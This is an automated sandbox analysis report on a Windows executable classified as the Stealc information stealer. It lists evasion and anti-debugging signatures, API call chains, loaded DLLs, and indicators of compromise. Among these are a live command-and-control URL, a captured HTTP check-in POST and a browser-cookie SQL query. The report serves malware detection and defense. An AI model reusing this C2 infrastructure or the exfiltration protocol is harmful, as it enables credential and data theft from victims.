
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1565981
MD5: a8d083b25843d8b182146793d9665ac5
SHA1: 7d64723ba2c0fa76e3f1126d3583331364e8815e
SHA256: 4597e4ff598b3353854bce87b300cc65cab353aad474b32fb2768b6931983973
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to detect virtual machines
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 7028 cmdline: "C:\Users\user\Desktop\file.exe" MD5: A8D083B25843D8B182146793D9665AC5)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security |
00000001.00000003.2188621265.0000000004F70000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000001.00000002.2277505797.00000000012DE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
Process Memory Space: file.exe PID: 7028 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Process Memory Space: file.exe PID: 7028 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
              No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-01T03:32:19.481696+0100 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49720 | 185.215.113.206 | 80 | TCP

              AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.206/c4becf79229cb002.php6/E | Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.php2.Y | Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpR. | Avira URL Cloud: Label: malware
Source: 00000001.00000002.2277505797.00000000012DE000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_008E4C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy | 1_2_008E4C50
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_008E60D0 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,lstrlen,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy | 1_2_008E60D0
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_008F6AA0 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy | 1_2_008F6AA0
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_009042C0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA | 1_2_009042C0
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_008E9B80 CryptUnprotectData,LocalAlloc,LocalFree | 1_2_008E9B80
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_008EEB80 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat | 1_2_008EEB80
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_008E9B20 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree | 1_2_008E9B20
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_008F6CB9 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy | 1_2_008F6CB9
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_008E7750 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree | 1_2_008E7750
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: .PdBo source: file.exe, 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_008F19F0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose | 1_2_008F19F0
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_008F3A70 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose | 1_2_008F3A70
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_008EDB80 lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose | 1_2_008EDB80
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_008F13A0 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose | 1_2_008F13A0
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_008F13B9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose | 1_2_008F13B9
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_008FE3F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose | 1_2_008FE3F0
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_008F4C89 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA | 1_2_008F4C89
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_008F24E0 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA | 1_2_008F24E0
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_008F24F9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA | 1_2_008F24F9
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_008F4C70 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose | 1_2_008F4C70
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_008FCDD0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose | 1_2_008FCDD0
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_008E16A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose | 1_2_008E16A0
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_008E16B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA | 1_2_008E16B9
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_008FD720 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose | 1_2_008FD720
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_008FDF20 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy | 1_2_008FDF20

              Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49720 -> 185.215.113.206:80
Source: Malware configuration extractor | URLs: http://185.215.113.206/c4becf79229cb002.php
Source: global traffic | HTTP traffic detected:
  GET / HTTP/1.1
  Host: 185.215.113.206
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
  POST /c4becf79229cb002.php HTTP/1.1
  Content-Type: multipart/form-data; boundary=----IDAAKEHJDHJKEBFHJEGD
  Host: 185.215.113.206
  Content-Length: 211
  Connection: Keep-Alive
  Cache-Control: no-cache
  Data Ascii: ------IDAAKEHJDHJKEBFHJEGDContent-Disposition: form-data; name="hwid"B2C1661792AC3343412148------IDAAKEHJDHJKEBFHJEGDContent-Disposition: form-data; name="build"drum------IDAAKEHJDHJKEBFHJEGD--
Source: Joe Sandbox View | IP Address: 185.215.113.206
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_008E6C40 lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,lstrcpy | 1_2_008E6C40
Source: file.exe, 00000001.00000002.2277505797.00000000012DE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000001.00000002.2277505797.00000000012DE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2277505797.0000000001338000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000001.00000002.2277505797.0000000001338000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/9
Source: file.exe, 00000001.00000002.2277505797.0000000001338000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/:
Source: file.exe, 00000001.00000002.2277505797.0000000001338000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: file.exe, 00000001.00000002.2277505797.0000000001338000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
Source: file.exe, 00000001.00000002.2277505797.0000000001349000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php2.Y
Source: file.exe, 00000001.00000002.2277505797.0000000001349000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php6/E
Source: file.exe, 00000001.00000002.2277505797.0000000001349000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpR.
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_008E9770 memset,memset,lstrcat,lstrcat,lstrcat,memset,wsprintfA,OpenDesktopA,CreateDesktopA,lstrcat,lstrcat,lstrcat,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlen,wsprintfA,lstrcpy,Sleep,CloseDesktop | 1_2_008E9770

              System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00CA20FA | 1_2_00CA20FA
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00C918F0 | 1_2_00C918F0
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00C948B5 | 1_2_00C948B5
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00C9D051 | 1_2_00C9D051
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00BB0871 | 1_2_00BB0871
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00C999C6 | 1_2_00C999C6
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00CA7195 | 1_2_00CA7195
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00C9E9AA | 1_2_00C9E9AA
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00C40AE5 | 1_2_00C40AE5
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00904AC0 | 1_2_00904AC0
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00BEC2C9 | 1_2_00BEC2C9
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00CA3B56 | 1_2_00CA3B56
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00C964D7 | 1_2_00C964D7
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00C9B488 | 1_2_00C9B488
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00B894CE | 1_2_00B894CE
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00CA5DC1 | 1_2_00CA5DC1
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00CA05D6 | 1_2_00CA05D6
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00C92ECE | 1_2_00C92ECE
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00B3FF73 | 1_2_00B3FF73
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 008E4A60 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: yktwzmco ZLIB complexity 0.9947829358427309
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_009048B0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle | 1_2_009048B0
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_008FCCD0 CoCreateInstance,MultiByteToWideChar,lstrcpyn | 1_2_008FCCD0
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\X43L2BNL.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe, 00000001.00000002.2277505797.00000000012DE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies;q
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: file.exe | Static file information: File size 1785856 > 1048576
Source: file.exe | Static PE information: Raw size of yktwzmco is bigger than: 0x100000 < 0x19a200
Source: Binary string: .PdBo source: file.exe, 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp

              Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 1.2.file.exe.8e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;yktwzmco:EW;jxtdziyw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;yktwzmco:EW;jxtdziyw:EW;.taggant:EW;
